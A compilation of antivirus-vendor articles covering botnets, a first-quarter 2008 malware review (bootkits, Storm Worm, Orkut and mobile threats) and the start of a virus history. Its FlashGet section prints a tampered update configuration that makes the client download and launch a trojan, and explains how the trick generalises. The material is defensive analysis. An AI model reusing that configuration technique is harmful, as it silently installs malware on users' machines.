A BotNet>
Botnets have been in existence for about 10 years; experts have been warning the public about the threat posed by botnets for more or less the same period. Nevertheless, the scale of the problem caused by botnets is still underrated and many users have little understanding of the real threat posed by zombie networks (that is, until their ISP disconnects them from the Internet, or money is stolen from their credit cards, or their email or IM account is hijacked).
A botnet is a network of computers which are infected with a malicious program that enables cybercriminals to remotely control infected computers. Malicious programs that are designed specifically for use in creating botnets are called bots.
Botnets have vast computing power. They are used as a powerful cyber weapon and are an effective tool for making money illegally. The owner of a botnet can control the computers which form the network from anywhere in the world – from another city, country or even another continent. Importantly, the Internet is structured in such a way that a botnet can be controlled anonymously.
The owner of an infected machine usually does not even suspect that the computer is being used by cybercriminals. Most zombie machines are home users’ PCs.
Botnets can be used by cybercriminals for conducting a broad range of malicious activities, from sending spam to attacking government networks.
Sending spam. This is the most common use for botnets, and is also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by botnet owners: botnets are often rented by spammers.
According to our data, an average spammer makes $50,000 – $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time.
Blackmail. The second most popular method of making money via botnets is to use tens or even hundreds of thousands of computers to conduct DDoS (Distributed Denial of Service) attacks. This involves sending a stream of false requests from bot-infected machines to the web server under attack. As a result, the server will be overloaded and consequently unavailable. As a rule, cybercriminals demand payment from the server’s owner in return for stopping the attack.
Today, many companies work exclusively on the Internet. Downed servers bring business to a halt, resulting in financial losses. To return stability to servers as soon as possible, such companies are more likely to give in to blackmail than ask the police for help. This is exactly what cybercriminals are counting on, and DDoS attacks are becoming increasingly common.
DDoS attacks can also be used as a political tool. In such cases, attacks usually target servers belonging to government organizations. What makes such attacks particularly dangerous is that they can be used as provocation, with a cyber attack on one country being conducted from servers in another country and controlled from a third country.
Anonymous Internet access. Cybercriminals can access web servers using zombie machines and commit cybercrimes such as hacking websites or transferring stolen money. This activity, of course, appears to come from the infected machines.
Selling and leasing botnets. One option for making money illegally using botnets is based on leasing them or selling entire networks. Creating botnets for sale is also a lucrative criminal business.
Phishing. Addresses of phishing pages are often blacklisted soon after they appear. A botnet allows phishers to change the addresses of phishing pages frequently, using infected computers as proxy servers. This helps conceal the real address of the phishers' web server.
Theft of confidential data. This type of criminal activity will probably never lose its attraction for cybercriminals. Botnets help increase the haul of passwords (passwords to email and ICQ accounts, FTP resources, web services etc.) and other confidential user data by a factor of a thousand. A bot used to create a zombie network can download another malicious program, e.g., a password stealing (PSW) Trojan, and infect all the computers on the botnet with it, providing cybercriminals with passwords from all the infected computers. Stolen passwords are sold or used for mass infections of web pages (in the case of FTP account passwords) in order to further spread the bot program and expand the zombie network.
The botnet business
The answer to the question why botnets keep evolving and why they are coming to pose an increasingly serious threat lies in the underground market that has sprung up around them. Today, cybercriminals need neither specialized knowledge nor large amounts of money to get access to a botnet. The underground botnet industry provides everyone who wants to use a botnet with everything they need, including software, ready-to-use zombie networks and anonymous hosting services, at low prices
The first thing needed to create a botnet is a bot, i.e. a program that can remotely perform certain actions on a user’s computer without the user’s knowledge. Software for creating botnets can be easily purchased on the Internet by simply finding a appropriate advertisement and contacting the advertiser.
A simple web-oriented botnet requires a hosting site where a command and control center can be located. Such sites are readily available, and come complete with support and anonymous access to the server (providers of anonymous hosting services usually guarantee that log files will not be accessible to anybody, including law enforcement agencies). Advertisements like the one shown below are abundant on the Internet.
When a C&C site has been created, what’s needed next are computers infected by a bot. One option is to buy a ready-made network with somebody else’s bot installed. Since stealing botnets is a common practice, most buyers prefer to replace both the malicious programs and the command and control centers with their own, thereby gaining guaranteed control over the botnet.
Conclusion
Today, botnets are among the main sources of illegal income on the Internet and they are powerful weapons in the hands of cybercriminals. It is totally unrealistic to expect that criminals will relinquish such an effective tool. Security experts view the future with some trepidation as they anticipate the continued development of botnet technologies.
It may not only be cybercriminals who have an interest in creating international botnets. Such botnets can be used by governments or individuals to exert political pressure in tense situations. In addition, anonymous control of infected machines that does not depend on their geographic location could be used to provoke cyber conflicts. All this takes is organizing a cyber attack on one country’s servers from computers located in another country.
Networks which unite the resources of tens or hundreds of thousands or even millions of infected computers, have the potential to be extremely dangerous – a potential which (luckily!) has not yet been fully exploited. Virtually all this cyber power stems from infected home computers, which make up the overwhelming majority of zombie machines exploited by cybercriminals.
Our annual report on malware evolution in 2007, published a few months ago, contained forecasts on how the threat landscape would evolve in 2008. Now that the first three months of the year have passed, we can start to draw some preliminary conclusions.
Unfortunately, as often happens in the antivirus industry, the conclusions are fairly discouraging. The speed at which the number of malicious programs is rising continues to increase, with thousands of new variants being detected every day. This is starting to be accompanied by increased technical sophistication, and we are also seeing a shift in attack vectors, with malicious users starting to direct their attention to less well protected fields, such as Web 2.0 technologies and mobile devices.
We continue to see the reincarnation of old ideas and techniques, and the implementation of these at new levels enhances the level of threat. Examples are infecting boot sectors on victim machines; spreading malicious programs via storage media, and infecting files.
It looks as though the first quarter of 2008 brought the symbolic, but irrevocable death of the old school of virus writing. At the end of February, the site of the legendary 29A group officially announced that the group would cease to exist.
The people who had created "Cap" (the first macro virus to cause a global epidemic), "Stream" (the first virus for additional NTFS streams), "Donut" (the first virus for the .NET platform), "Rugrat" (the first virus for the Win64 platform), the mobile viruses Cabir and Duts and many others, have now retreated, under pressure from the increased criminalization of the world of virus writers. No one creates malicious programs to express themselves, assert their personality or for research purposes anymore – it's far more profitable to generate hundreds of primitive Trojan programs and then sell them.
The death of 29A was commented on by nearly all the major antivirus companies: each company threw a virtual clod of earth on the grave of the group which in its time created many difficulties for virus analysts. So it's fitting that we should also mention the event.
As for what came to replace the 'romantic' ideal of virus writing in 2008, this is discussed in the following chapters:
Bootkit
The storm continues
TrojanGet
Some sociable worms
Mobile news
Bootkit
Bootkit rootkits – rootkits with the ability to boot from the boot sector of any device – became, de facto, the main problem for the antivirus industry at the start of 2008. Although the efforts made to combat this problem, and the seriousness of the issue may not have been obvious to the public at large, it may be that the subject will come to cause problems for everyone in the near future.
The story begins
It all started in November 2007, or perhaps, more correctly, in 2005. However, this isn't totally correct either. Let's take a quick trip into the past and recall what took place 22 years ago, in 1986.
This is how the events of that year are described in the Virus Encyclopaedia on viruslist.com (http://www.viruslist.com/en/viruses/encyclopedia?chapter=153311030):
The first global IBM-compatible virus epidemic was detected. Brain, which infected the boot sector, was able to spread practically worldwide within a few months. The almost total lack of awareness in the computing community of how to protect machines against viruses ensured Brain's success. In fact, the appearance of numerous science fiction works on the topic only strengthened the panic, instead of teaching people about security.
The Brain virus was written by a 19 year old Pakistani programmer, Basit Farooq Alvi, and his brother Amjad, and included a text string containing their names, address and telephone number. According to the virus's authors, who worked in sales for a software company, they wanted to gauge the level of piracy in their country. Aside from infecting a disc's boot sector and changing the disk name to '© Brain', the virus did nothing; it had real payload, and did not corrupt data. Unfortunately, the brothers lost control of their so-called experiment and Brain spread worldwide.
Interestingly enough, Brain was also the first 'stealth virus.' When an attempt to read the infected sector was detected, the virus would display the original, uninfected data.
So this was the start of the story. For more than 10 years, boot viruses were one of the most widespread type of malicious programs.
The principle on which these viruses work is relatively simple: they use algorithms which launch the operating system when the computer is switched on or rebooted. The system boot program reads the first physical sector of the boot disk (A:, C:, or the CD-ROM drive, depending on BIOS Setup parameters) and pass control to it. If there is a virus on the boot sector, the virus will gain control.
There's only one method known which is used to infect floppies: the virus replaces the original boot sector code on the disk with its own code. The hard drive can be infected in three different ways – the virus either replaces the MBR code with its own code; replaces the boot sector code on the boot disk (usually C:) with its own code, or modifies the address of the active boot sector in the Disk Partition Table located on the hard drive MBR.
In the majority of cases, when infecting the disk the virus moves the original boot sector (or the MBR) to another disk sector (for instance, to the first free sector).
Developers started adding protection to prevent the MBR from being written to. Windows 95/98 appeared, floppies started to disappear from use, and after almost a decade, boot sector viruses faded from the landscape, becoming part of the history of virology.
However, at Black Hat USA in 2005, Derek Soeder and Ryan Permeh, two researchers from eEye Digital Security, presented BootRoot. This technology made it possible to place code on the boot sector of the disk – code that would intercept the booting of the Windows kernel and launch a backdoor, making it possible to remotely administer the machine via the local network.
This work attracted a certain amount of attention, and it was soon emulated. In January 2006, John Hesman from Next-Generation Security Software announced that functions for managing the electricity supply of the computer (the so-called ACPI – Advanced Configuration and Power Interface) make it possible to create programs which implement rootkit functions that can be saved to the BIOS flash memory. Malicious code saved in this location (BIOS) is more difficult to detect than in the case of the boot backdoor. Hesman also created prototype code which makes it possible to increase system privileges and read data from the computer memory.
A year later, at the end of 2007, two Indian programmers called Nitin and Vipin Kumar presented Vbootkit – a rootkit with a function making it capable of launching from the boot sector of any device. The program can also run on Windows Vista. The source code was not made public, but was passed to some antivirus companies.
The main principle behind Vbootkit is shown below:
BIOS --> Vbootkit code(from CD,PXE etc.) --> MBR --> NT Boot sector --> Windows Boot manager --> Windows Loader --> Vista Kernel.
The authors promised to implement BIOS infection in the next version of the bootkit.
In other words, what came to pass was no surprise – old technology for infecting the boot sector was combined with the fashion for rootkits. In spite of the fact that nearly all antivirus companies today are able to scan the boot sector of disks, it's still difficult to detect if system functions have been intercepted or substituted. And this is true even in the case of a Trojan and an antivirus running on one operating system, without even addressing a backdoor which starts before the operating system has launched.
All of the above seems like a potentially explosive mixture that could go up at any moment. And the explosion came in November 2007, although news of this came slightly later, at the end of December, when several thousand users (there is no exact data on the number of infections) came under attack from the first malicious implementation of a bootkit.
The bootkit
Between the 19th and the 28th December several websites appeared which used drive-by downloads (infecting a victim machine by placing exploits on a web site which then download a malicious program). A detailed analysis of the malicious program revealed code able to infect the MBR and hard disk sectors.
Once on the victim machine, the malicious code modifies the MBR, writes the rootkit part to a disk sector, extracts a Windows backdoor from itself, installs the backdoor, and then deletes itself.
When infecting the MBR, instructions pass control to the main part of the rootkit which is placed on several hard disk sectors and which is not represented as files in the system. This part monitors the already loaded Windows operating system and when reading, it hides the infected MBR and the "dirty" sectors by presenting clean ones instead. It does this by intercepting and substituting system functions.
In addition to hiding its presence in the system, the malicious code installs a backdoor in Windows; the backdoor will steal user data, including user data to a range of online banking systems.
A reconstruction of events based on the variants of the rootkits detected, analysis of the infected sites and the code of the malicious program downloaded from these sites showed that from November 2007, the unknown authors had been preparing to launch their code on the world. Several of the first variants of this malicious program stem from mid-November to mid-December; these are effectively alpha versions which contain serious errors in the code, and indicate that the authors were searching for optimal variants.
The code released at the end of December was already relatively effective. We classified the malicious program, which combined the functions of a bootkit and a backdoor, as Backdoor.Win32.Sinowal. This was because many of the functions in the backdoor, and also the method used to 'litter' code were identical to those which we are familiar with in Trojan-PSW.Win32.Sinowal.
In spite of increased sophistication and the many innovations implemented in the bootkit, it's only able to protect itself – this leaves the backdoor file open to being detected and deleted. This indicates that different people were involved in developing the bootkit and the backdoor, and there are a number of reasons to suggest that the bootkit was created by virus writers from Russia. There are well known cases in which virus writers have worked together. However, the result in this case suggests a warrior who has been hastily dressed in another's reforged armour which is, effectively, useless.
Nevertheless, the bootkit appears to be a self-sufficient platform – something that could be added to any existing malicious program in order to protect that program and mask its presence in the system. It may be that bootkits for sale will appear in the near future, making the technology available to thousands of script kiddies. Taking into account the rate at which the number of malicious programs is increasing, this could become one of the most widespread threats.
Protecting against bootkits: the problems
Why is it so difficult to protect against bootkits? The main problems are as follows:
The malicious code gains control before the operating system starts, and, consequently, before the antivirus program starts
It's difficult to detect the interception of functions from within an infected operating system
Restoring intercepted functions can lead to the entire operating system crashing
Curing the MBR is only possible if the original MBR can be detected
Of course, the best protection is to prevent the system from getting infected in the first place – after all, a bootkit doesn't materialize out of thin air. It has to get onto the computer somehow. Some antivirus programs are able to prevent infection even by unknown variants of malicious programs. However, there is always the possibility that such protection can be penetrated, and this raises the question of how to disinfect an already infected machine.
Here there are two options – either an antivirus is already installed on the system (in such cases, the four points mentioned above relate to the antivirus solution) or there is no antivirus, and one needs to be installed. In the second case, we encounter an additional problem related to that in point 1; the malicious code can block attempts to install an antivirus solution on the infected system.
Virus writers have analysed how antivirus companies solve the problems listed above, and in February 2008, a new improved version of the bootkit was released. All the methods previously implemented to combat bootkits turned out to be useless.
At the same time, the bootkit started spreading in new ways. Links to sites containing exploits which would install the bootkit were discovered on a number of European sites which had been hacked.
So far, apart from Sinowal, we haven't detected any other malicious programs which come equipped with a bootkit. At the moment, the standoff between antivirus companies and virus writers is following the classic path of attack and counter-attack. Even the latest variants of the bootkit can be combated without significant innovations in antivirus solutions.
However, looking a couple of steps down the line it's clear that sooner or later that only one method will guarantee that such malicious programs can be detected and deleted. This will entail a shift from software protection to hardware protection.
The key question is what gains control first – if it's the virus, then an antivirus will, a priori, be useless.
So, viruses have (again) reached the MBR. 10 years ago we solved this problem by using a boot disk equipped with an antivirus. It may be that the time is coming when we'll see the return of not just old virus technologies, but old antivirus technologies as well.
The storm continues
Mid January 2008 marked the first anniversary of the appearance of the first samples of what would become known, variously, as Zhelatin, Nuwar or the Storm Worm. Until then, computer virology had not encountered such a vigorously and variedly evolving malicious program.
Zhelatin continued to use and develope the concepts which had been implemented in the Bagle and Warezov worms. Zhelatin took its modular structure from Bagle, and copied Warezov in the frequent release of new variants. It also resembled Warezov in moving away from mass-mailing the main component via email, instead using hundreds of infected sites as well as Skype and IM to spread the malicious code. Added to all of this were social engineering tricks, rootkit technologies, methods for launching counter attacks on antivirus companies, and a decentralized botnet. In less than a year, the Storm Worm became the information security industry's main problem, due to its almost mythical botnet.
The exact dimensions of the Storm botnet remain a mystery. In 2007 we heard a widely varying range of estimates of the number of infected machines, and these estimates were all voiced around the same time. For instance, in September some experts estimated that the botnet had 2 million machines; others put the figure at between 250,000 and a million, while a third group believed the size to be 150,000 machines. There were even those who talked of 50 million infected computers! The reason for such a wide variety of figures is clear – because of the decentralized nature of the botnet, it's impossible to establish the exact number of zombie machines. Estimates can only be made based on indirect indicators, which are of course debateable.
Whichever way you look at it, the Storm botnet did exist. However, it was inactive. There was no 'classic' botnet activity detected; it wasn't used for mass mailings, or to conduct DDoS attacks (which, incidentally, doesn't rule out the botnet having been created by cybercriminal for criminal use). This left the impression that the botnet didn't perform any function apart from spreading the Storm worm itself (it did this by sending new messages containing links to infected sites and then placing modules on the infected machines which would then be downloaded onto new victim machines). It really wasn't clear why the botnet had been created: simply for the sake of it? But that doesn't happen – botnets take far too many resources to create and maintain.
Around October 2007, the frequency of mass mailings conducted by Zhelatin started to decline somewhat. Experts who had previously talked about millions of infected machines started to drop their estimates of the size of the botnet to between 150,000 and 200,000 computers. The suspicious emerged that the botnet was being prepared to be sold on in sections. Around the same time, the first mass mailings of spam from computers infected with the Storm Worm were detected. However, it couldn't be stated conclusively that spam was being sent via the botnet, rather than via other malicious programs which might also be located on the victim machines.
The end of 2007 and the early months of 2008 provided an answer to the question of what was happening with the Storm Worm.
At Christmas, the worm reappeared. The botnet started sending out millions of messages with titles such as "Find Some Christmas Tail", "Warm up this Christmas" and "Mrs. Clause Is Out Tonight!". The messages were designed to entice the user to a site called merrychristmasdude.com, which contained exploits that would conduct a drive-by download to get the Storm Worm onto victim machines. In actual fact, merrychristmasdude.com wasn't a single site which could have been closed down in order to prevent infection. Zhelatin used fast-flux, a technique for changing DNS addresses which constantly modifies the location of the site between more than a thousand deliberately prepared computers.
Similar attacks, with only slight variations, carried on over the next few days, up until 15th January, when something strange happened. Either it was a joke on the part of the authors, or they simply made a mistake; whatever the case, the botnet started sending out messages containing Valentine's cards, even though Valentine's Day was still a month off.
The messages had titles such as "Sent with Love", "Our Love is Strong", "Your Love Has Opened" and so on. Naturally, the messages led the user to the fast-flux site currently being used.
The mass mailings in January turned out to be on a larger scale and also more intrusive than those which were conducted in the second half of 2007. They were also the largest mass mailings carried out in the first quarter of 2008. The authors of Zhelatin had struck a series of blows to either return the botnet to its original size or perhaps even to enlarge it. Computers infected by Zhelatin started to participate in DoS attacks, and MessageLabs started estimating that the Storm botnet was behind almost 20% of spam currently being sent out.
At approximately the same time Fortinet announced it believed the botnet was part of phishing attacks launched against the Barclays and Halifax banks. If this is the case, then it is the first time the Storm botnet has been directly used for classic cybercrime aims.
At the same time as the Storm Worm increased its activity, talk turned to the need to catch and sentence its authors. However, experts couldn't agree on even the nationality of those behind the worm, never mind naming names.
At the moment, there are two prevailing points of view. Dmitry Alperovitch from Secure Computing believes that a Russian is responsible, even going so far as to point to a location in St. Petersburg. He draws parallels with the notorious Russian Business Network (RBN) and the authors of the exploit bundle Mpack. Many experts support the view of the worm's Russian origins.
Others believe that the Storm Worm has been created by Americans. This argument is supported by the fact that the authors, in their use of social engineering tactics, demonstrate a suspiciously good knowledge of American life and psychology. The mass mailings play on specific incidents and events which will be of particular interest to the American public. And these events could well be unknown to virus writers from other countries, and particularly those from Russia.
We do not have any information which supports one point of view or the other. It seems to us that one of the most likely scenarios is that an international group which has clearly defined responsibilities lies behind this activity. Someone creates the worm; someone else is responsible for mass mailings; someone else places the worm on the infected sites; someone else hacks the sites; someone else is responsible for spreading the malicious program via instant messaging, and finally, yet another person is responsible for creating the exploits.
The widespread nature of the Storm Worm and the attack vectors which are being used are far too extensive to be within the capabilities of one, two or three people. If our suppositions are correct, then the Storm Worm is a text book example of modern cybercrime and its international distribution of labour. It is of course true that it is still unclear how the cybercriminals are making money using the Storm Worm.
While we were still looking for the answers to the questions raised by the Storm Worm, at the end of March its authors sent out the latest flood of messages. The occasion – April 1st, known throughout the US, Europe and Russia as April Fool's Day.
The question remains: who will have the last laugh?
TrojanGet
Although incidents in which legitimate programs and software companies spread infection are relatively rare, they do exist in the information security world. Past cases have ranged from infected distributions to infected document files being sent to clients and partners.
Every incident of this nature has a significant effect on the reputation either of the software or of the company concerned. They affect users who do observe the basic rules of computer security and cause problems for antivirus companies who view legitimate software and the sources it stems from as trustworthy.
The first quarter of 2008 brought the latest case of this type.
At the beginning of March, Kaspersky Lab analysts received messages from users saying that a Trojan was present in the directory of the popular download client FlashGet. Analysis showed that the problem affected users throughout the world. The symptoms of infection were the appearance of files called inapp4.exe, inapp5.exe and inapp6.exe in the system. Kaspersky Anti-Virus detected these files as Trojan-Dropper.Win32.Agent.exo, Trojan-Dropper.Win32.Agent.ezo and Trojan-Downloader.Win32.Agent.kht.
It was a strange situation: no other Trojan program which could have got this Trojan onto the system was detected. Some of the victims had fully patched operating systems and browsers. So how could these malicious programs have penetrated the infected machines?
What attracted our attention straight away was the location of the Trojans – in the FlashGet directory itself. A quick check showed that apart from the presence of the Trojan files, the FGUpdate3.ini file had recently been created and modified (the blue text shows the differences from the original file):
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%
The link to inapp4.exe (the Trojan file) led to the genuine FlashGet site: the Trojan would download from the site in the form of a file called appA.cab.
There wasn't any information about the incident on the FlashGet site, and a look at the user's forum returned a lot of messages about both about infections, and the fact that the developers were remaining silent on this matter.
Information found on the Internet showed that the first cases of infection had been detected back on 29th February. The most recent infection that we knew of at that time had been on 9th March. For ten days, a legitimate program had been acting as a Trojan downloader program, installing and launching Trojan programs placed on the developers' site on victim machines.
It might have seemed that the incident was over – when we published information about this case, the Trojans had already been deleted from the site, and the FGUpdate3.ini file (which is also downloaded from the Internet) had been reverted to its original condition. However, in less than two weeks, on 22nd March, Steve Bass, the editor of the popular publication PC World, detected Trojan-Downloader.Win32.Agent.kht in his FlashGet directory. It looked as though history was repeating itself – both the FlashGet site and the program itself were once again spreading malicious code.
We can see two ways in which FlashGet could be transformed into a Trojan downloader program.
The first is the most obvious explanation – the site itself was hacked. As a result, a malicious user would be able to replace the standard configuration file with a file that would lead to the Trojan placed on the site. We don't know why the hackers didn't use a different site – it might be that they worked on the principle that hiding in plain view (e.g. a link to the FlashGet file in the configuration file would not raise suspicions) would be the best disguise.
We decided to check if it would be possible to use this trick to download any other files from any other sites. The answer: yes. All you need to do is add a link to the FGUpdate3.ini file. And that link can lead to anything, which will then be automatically downloaded and launched on your computer each time FlashGet is launched. Even if you don't press "Refresh", FlashGet will independently use the information from the .ini file.
The 'vulnerability' is present in all versions of FlashGet 1.9.xx. This means that even though the hack of the FlashGet site has been fixed, the vulnerability in the user's system remains. Any Trojan program can modify the local FlashGet .ini file, making it act as a Trojan downloader. And it's this method which is the second of the two mentioned above.
Is there any need to stress the fact that FlashGet is usually treated as a trusted application, and that any network activity generated by the program is seen as legitimate, as well as contacting any sites?
There has, to date, been no official reaction from the Chinese company which develops FlashGet. The true cause of the incident remains unknown, and there is no guarantee that it will not happen again. You can draw your own conclusions…
Antivirus companies retain the right to decide whether or not FlashGet is potentially malicious, and have started to classify it as Riskware. There are more than enough grounds for doing so.
Some sociable worms
We wrote about the danger caused by social networking sites in our annual report. We forecast that in 2008 users of social networking sites will become the main targets for phishing attacks. There will start to be increased demand among malicious users for account data to services such as Facebook, MySpace, LiveJournal, Blogger and others. This will become a dangerous alternative to placing malicious programs on hacked sites. In 2008, many Trojan programs will spread via user accounts on social networking sites, on their blogs and on their profiles.
February 2008 met these expectations in full. Once again Orkut, the popular social networking site owned by Google, came under attack.
Orkut is extremely popular in a number of countries through the world, and particularly in Brazil and India. According to data provided by Alexa.com, a web information company, 67% of the requests made to Orkut come from Brazil, and more than 15% from India.
For the last few years, Brazil has been seen as one of the most virus-ridden countries in the world. Brazilian virus writers are notorious for the thousands of different Trojans they've created to steal user data to bank accounts. Families such as Bancon, Banpaes and Banload are made up almost 100% of Trojans created in South America.
Online banking is very popular in Brazil. Orkut is very popular in Brazil. There are lots of virus writers in Brazil. These three factors combine to result in one thing: the appearance of a worm which spreads via Orkut and steals account data to online banking systems.
Out of all the social networking sites, Orkut has the longest list of malicious programs which target it. In 2006 and 2007 the site suffered from virus epidemics, and between 2005 and 2007, Orkut was the target of hacker attacks, and many vulnerabilities were detected. The most recent publicized incident was the appearance of a script worm in December 2007, when over 700,000 users ended up infected.
A mere two months later, in February 2008, a new epidemic broke out. This time the hackers hadn't bothered to search for or exploit XSS vulnerabilities on Orkut. The new worm functioned in accordance with relatively simple principles:
The user gets a message from one of his/ her contacts. The message contains a pornographic picture in flash movie format.
If the user clicks on the image, s/he is redirected to a malicious site.
The user is asked if s/he wants to install a flash player application, which is in fact a Trojan program.
Once the Trojan has been downloaded and launched, it will download other Trojan components to the victim machine via the Internet.
The user account is then used to create new messages as described in point 1.
The malicious module tracks the user's use of Orkut.
Other modules harvest data entered via the keyboard when the user contacts Brazilian online banking systems.
It's impossible to establish the exact number of victims, but our colleagues from Symantec estimate a minimum of 13,000 affected users.
This incident shows once again how vulnerable users of social networking sites can be. The main factors which make Web 2.0 services popular with users and hackers alike are listed below:
The migration of user data from the PC to the Internet
The ability to use one account to access a number of different services
Detailed information about the user
Information about the user's contacts and friends
Space to publish whatever you like
Trust between contacts
The problem has already become fairly serious, and stands every chance of becoming a major information security issue. We'll be releasing a paper dedicated to this topic in the near future.
Mobile News
The world of mobile virology was an eventful place in the first quarter of 2008. It was clear that technologies were continuing to evolve and more and more participants - both virus writers and antivirus companies – got involved. Innovations in terms of malicious code were split more or less evenly between the four targets of Symbian, Windows Mobile, J2ME and the iPhone .
Symbian
As far as Symbian goes, this operating system came under attack by the latest worm from a completely new family. Up until this point, we'd see two types of threat: Cabir, which spreads via Bluetooth, and ComWar, which spreads via MMS. Of course, there were several variants of both these worms.
At the end of December, a program was added to our antivirus databases which at first glance seemed to simply be a new ComWar clone: ComWar.y. However, in January the appearance of this program in the traffic of one of the largest mobile operators forced us to take a more detailed look at the new sample.
An analysis conducted by one of our partners, the Finnish company F-Secure, showed that in actual fact this malicious program was representative of a completely new family, which had nothing in common with ComWar, created three years ago in Russia.
The worm, which was classified as Worm.SymbOS.Beselo.a (Beselo.b was detected shortly afterwards) functions in a way very similar to ComWar, and takes an approach typical for worms of this type. It spreads by sending infected SIS files via MMS and Bluetooth. Once the worm is launched on the device under attack, the worm starts to send itself to the contacts on the phone, and also to all accessible Bluetooth devices within range.
What's the news value in this? It's the fact that there is a new, active family of worms for mobile devices (which implies the existence of active virus writers) and the presence of this worm in the wild. New variants of Beselo could cause serious local epidemics – this after all is what happened in spring last year, when 115,000 smartphone users fell victim to a Spanish modification of the ComWar worm.
Windows Mobile
The appearance of a new malicious program for Windows Mobile, which hasn't been a focus of attention for virus writers up until now, is certainly noteworthy. However, InfoJack, a Trojan which was detected at the end of February, is particularly interesting for the following reasons:
InfoJack.a
attacks Windows Mobile
was detected in the wild
is spreading in China
steals data
This is the first malicious code targeting Windows Mobile which has been found in the wild and which has caused a significant number of infections. The code spread from a Chinese site which contained a range of types of legitimate software. The Trojan was added to mobile product distributives such as Google Maps and game clients. The owner of the site which the Trojan spread from stated that he did not have any illegal intentions, but was collecting information about the users of the site in order to improve the service and to analyze the market for mobile applications.
Once it is on the system, the Trojan attempts to disable the protection mechanism which prevents the installation of applications which do not include a developer's digital signature. When the infected smartphone is connected to the Internet, InfoJack starts to send confidential information from the device to the Trojan's site. This information includes the device serial number, information about the operating system and installed applications. At the same time, the Trojan may download additional files to the phone without the knowledge of the user, and launch these files – it's able to do this because protection against launching unsigned applications has been disabled.
After a few days the activity of the site was halted, probably in connection with the investigation conducted by the Chinese police.
This report has already covered what happens when virus writers turn their attention to popular services (e.g. the attacks on Orkut in Brazil). China is undoubtedly the world leader in terms of production of malicious code; at the moment, more than 50% of all new malicious programs in our antivirus databases originate in China. Until now, Chinese hackers have targeted online gamers who use personal computers. However, the case of InfoJack shows that there is the capability to organize mass epidemics and create mobile viruses.
China has become the first country to suffer from a Windows Mobile Trojan. It's possible that the author of InfoJack really didn't have anything illegal in mind. However, now the foundation has been laid, the thousands of Chinese hackers currently creating viruses for personal computers may choose to build on it.
J2ME
During the first quarter of 2008, Trojans for J2ME (which will run on almost any modern mobile, and not just on smartphones) started appearing with frightening regularity. In January we detected Smarm.b, followed by Smarm.c and Swapi.a, and March brought SMSFree.d
All these Trojans were detected in Russia, and they all use the same method for making money out of users: sending SMS messages to premium numbers. (An investigation into a similar SMS sending Trojan, Viver, which we conducted last year, showed that in three days the author of the Trojan could earn approximately $500). In spite of all these incidents, Russian mobile content providers continue to maintain the anonymity of those who register premium numbers. This effectively makes virus writers immune to prosecution: the appearance of new variants of malicious programs and a lack of information about any arrests clearly demonstrates this.
Apart from the J2ME Trojans mentioned above, there are another two malicious programs which send SMS message for which a charge is made. Flocker.d and Flocker.e, both written in Python and designed to attack smartphones, were detected in January 2008.
These malicious programs use the same propagation method as InfoJack: they spread via popular sites which offer software for mobile phones. The Trojans are either disguised as legitimate utilities, or are integrated into such products.
iPhone
We'll conclude this section on mobile threats with information about a long awaited event: the release in March of the iPhone SDK.
We had believed that the release of the SDK would lead to the appearance of a multitude of malicious programs for iPhone. However, what the open Apple SDK provides is actually very limited.
Apple has followed Symbian's lead: the model for creating and distributing programs for the iPhone is based on the idea of 'signed' applications. The main restrictions are laid out in the agreement for use for the iPhone SDK:" No interpreted code may be downloaded and used in an application except for code that is interpreted and run by Apple's published APIs and built in interpreter(s). An application may not itself install or launch other executable code by any means, including without limitation through the use of a plug-in architecture, calling other frameworks, other APIs or otherwise."
This restrictions do not only make life more difficult for virus writers, but they also effectively rule out such applications as Firefox, Opera, many games, IM clients and much other useful software: applications which could be extremely popular among iPhone users and which could extend the device's capability.
In the four days after the SDK was released, it was downloaded more than 100,000 times. It seemed that such a huge number of potential developers should lead to an increase in new applications created using the SDK. However, this is not happening.
Apple has, in a formal sense, fulfilled its promise by making the SDK available. However, it's not yet clear how this step will influence the development even of legitimate software for the phone. The restrictions are too stringent, and too many functions in the SDK remain closed.
The second major restriction is that applications which have been created using the SDK can only be distributed via Apple's estore. This creates a large number of additional barriers, ranging from the number of 'vendors' (developers) allowed, to geographical restrictions (only those in the USA are allowed to participate).
It's clear that under these conditions it will be impossible to launch an antivirus product for the iPhone – not for technical reasons, but due to the issues described below.
The continued hacking of the iPhone acts as the backdrop here. It's estimated that between 45% - 50% of all devices sold have been 'unlocked'. All of these devices are potentially vulnerable to infection by any malicious program for iPhone, as the user will be downloading files from many different unofficial sources to his/ her device. This can't be controlled in any way: users of modified phones are not entitled to official technical support, and we'll be unable to provide them with any antivirus protection.
It's likely that in the foreseeable future the number of people using such devices will equal the number of Symbian smartphone users in 2004 – the year that Cabir appeared.
Conclusion
The events of the first three months of 2008 show that the period of technical stagnation in the threat landscape is drawing to a close.
Last year, we described conveyor belt code: a process generating multiple primitive copy-cat programs, which do not make implement new virus technologies. The phenomenon can be explained: virus writers chose to use tried and tested methods because at the time, even old well known approaches, were capable of bringing in profits if applied on an industrial scale.
However, now there is a noticeable change in direction, which is shown above all by the appearance of the first malicious implementation of a bootkit. In addition to this, file infection methods are being used more and more frequently, often in conjunction with complex polymorphic techniques. It should also be noted that virus writers are borrowing certain technologies from the antivirus world. For instance, we've already detected malicious programs which, in order to combat antivirus solutions by deleting them or blocking their installation contain signature detection for the antivirus file. Previously virus writers confined themselves to having their creations search for such files by name.
Today, old technologies are being re-examined, rethought, and implemented at new levels. The struggle of virus versus antivirus is moving from software towards the hardware level.
Although the events of the first quarter of 2008 cannot yet be seen as creating a definite trend, the issues raised may have a strong influence on the entire information security business in the near future.
Virus History>
Boot sector and DOS file viruses were the first PC viruses, and by the end of the 1980s, these threats had been joined by a few worms and the first Trojans. Virus writers used a range of stealth techniques to extend the life cycle of malicious code by evading antivirus scanners. Some of these techniques, such as suppressing error messages, and polymorphism (which ensures the virus code is different each time it infects a machine) are still used by virus writers today.
